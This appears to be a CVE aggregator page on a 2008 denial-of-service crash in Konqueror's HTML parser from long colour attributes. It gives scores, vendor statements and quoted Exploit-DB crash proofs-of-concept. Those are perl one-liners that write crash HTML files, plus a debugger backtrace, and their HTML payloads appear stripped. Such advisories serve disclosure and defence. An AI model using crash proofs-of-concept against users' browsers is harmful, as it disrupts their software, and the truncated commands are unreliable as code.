CVE-2008-4514
published 2008-10-09CVE-2008-4514: The HTML parser in KDE Konqueror 3.5.9 allows remote attackers to cause a denial of service (application crash) via a font tag with a long color value, which…
PriorityP418medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
7.74%
93.9th percentile
The HTML parser in KDE Konqueror 3.5.9 allows remote attackers to cause a denial of service (application crash) via a font tag with a long color value, which triggers an assertion error.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| kde | konqueror | — | — |
| konqueror | konqueror | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-h8jh-g7wj-qxjv: The HTML parser in KDE Konqueror 3
ghsa_unreviewed·2022-05-17·CVSS 5.0
CVE-2008-5712 [MEDIUM] CWE-20 GHSA-h8jh-g7wj-qxjv: The HTML parser in KDE Konqueror 3
The HTML parser in KDE Konqueror 3.5.9 allows remote attackers to cause a denial of service (application crash) via (1) a long COLOR attribute in an HR element; or a long (a) BGCOLOR or (b) BORDERCOLOR attribute in a (2) TABLE, (3) TD, or (4) TR element. NOTE: the FONT vector is already covered by CVE-2008-4514.
GHSA
GHSA-3f9f-vphf-4p5x: The HTML parser in KDE Konqueror 3
ghsa_unreviewed·2022-05-02
CVE-2008-4514 [MEDIUM] CWE-20 GHSA-3f9f-vphf-4p5x: The HTML parser in KDE Konqueror 3
The HTML parser in KDE Konqueror 3.5.9 allows remote attackers to cause a denial of service (application crash) via a font tag with a long color value, which triggers an assertion error.
Red Hat
CVE-2008-4514: The HTML parser in KDE Konqueror 3
vendor_redhat·CVSS 5.0
CVE-2008-4514 [MEDIUM] CVE-2008-4514: The HTML parser in KDE Konqueror 3
The HTML parser in KDE Konqueror 3.5.9 allows remote attackers to cause a denial of service (application crash) via a font tag with a long color value, which triggers an assertion error.
Statement: We do not consider a crash of a client application such as Konqueror to be a security issue.
Red Hat
CVE-2008-5712: The HTML parser in KDE Konqueror 3
vendor_redhat·CVSS 5.0
CVE-2008-5712 [MEDIUM] CVE-2008-5712: The HTML parser in KDE Konqueror 3
The HTML parser in KDE Konqueror 3.5.9 allows remote attackers to cause a denial of service (application crash) via (1) a long COLOR attribute in an HR element; or a long (a) BGCOLOR or (b) BORDERCOLOR attribute in a (2) TABLE, (3) TD, or (4) TR element. NOTE: the FONT vector is already covered by CVE-2008-4514.
Statement: Red Hat does not consider a crash of a client application such as Konqueror to be a security issue.
No detection rules found.
Exploit-DB
Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities
exploitdb·2008-10-08
CVE-2008-5712 Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities
Konqueror 3.5.9 - 'color'/'bgcolor' Multiple Remote Crash Vulnerabilities
---
KDE's Konqueror & Color Attribute Love
perl -e 'print "\n" . "\n"' > kdie.html
perl -e 'print "\n" . "\n"' > kdie2.html
perl -e 'print "\n" . "\n"' > kdie3.html
perl -e 'print "\n" . "\n"' > kdie4.html
perl -e 'print "\n" . "\n"' > kdie5.html
perl -e 'print "\n" . "\n"' > kdie6.html
perl -e 'print "\n" . "\n"' > kdie7.html
perl -e 'print "\n" . "\n"' > kdie8.html
# milw0rm.com [2008-10-08]
Exploit-DB
Konqueror 3.5.9 - 'font color' Remote Crash
exploitdb·2008-10-06
CVE-2008-5712 Konqueror 3.5.9 - 'font color' Remote Crash
Konqueror 3.5.9 - 'font color' Remote Crash
---
Konqueror isn't immune from fuzzing either
Konqueror, KDE's mighty mascot browser.. fuzzed.
perl -e 'print "\n" . ""' > kdie.html
#6 0xb7f8d410 in __kernel_vsyscall ()
#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6
#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6
#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6
#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6
#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6
#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6
#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3
#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3
#16 0xb60c5250 in
No writeups or analysis indexed.
2008-10-09
Published